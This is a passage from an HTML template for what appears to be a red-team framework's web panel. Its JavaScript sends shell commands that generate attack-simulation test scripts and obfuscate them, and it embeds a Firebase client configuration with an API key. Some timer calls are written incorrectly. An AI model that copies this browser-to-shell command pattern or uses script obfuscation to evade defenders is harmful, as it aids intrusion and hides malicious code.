                            }
                        }
                    })
                    .catch(error => {
                        spinner.style.display = 'none';
                        console.error('Error:', error);
                        document.getElementById('taskResponse').innerHTML += `<p style="color: red;">Error de red: ${error.message}</p>`;
                    });
                   
                    fetchTasks();
                });   
                document.getElementById('generalButton').addEventListener('click', function() {
                    $('#generalModal').modal('show');
                });

                document.getElementById('generalFormbot').addEventListener('submit', function(event) {
                    event.preventDefault();
                    formGeneral_bot();
                });   

                document.getElementById('atomic_form').addEventListener('submit', function(event) {    
                    event.preventDefault();
                    var id_atomic = document.getElementById('id_atomic').value;
                    const spinner = document.getElementById('loader');
                    spinner.style.display = 'block';
                    var command = 'atomic_gen ' + id_atomic ;
                    RunCmd(command)
                    setInterval(console.log(cleanOutputText), 5000); 
                    //command = "ofuscatorps1 sessions/atomic_test_"+ id_atomic + ".ps1";
                    //RunCmd(command)
                    setInterval(console.log(cleanOutputText), 5000); 
                    command = "ofuscatesh sessions/atomic_test_"+ id_atomic + ".sh";
                    RunCmd(command)
                    setInterval(console.log(cleanOutputText), 5000); 
                    spinner.style.display = 'none';
                    
                });                   
                fetchTasks();     
                
                setInterval(fetchTasks, 1800000); 
            });

        </script>
        <script type="module">
            
            import { initializeApp } from "https://www.gstatic.com/firebasejs/11.1.0/firebase-app.js";
            
            
          
            
            const firebaseConfig = {
              apiKey: "AIzaSyA-lTI_yhgyDqLrMX1rq6G8qSVQHGLDcio",
              authDomain: "lazyown-ec930.firebaseapp.com",
              projectId: "lazyown-ec930",
              storageBucket: "lazyown-ec930.firebasestorage.app",
              messagingSenderId: "629740909985",
              appId: "1:629740909985:web:4b52d61c043193310787e0"
            };
          
            
            const app = initializeApp(firebaseConfig);
          </script>
    </body>
    </html>
    {% endblock %}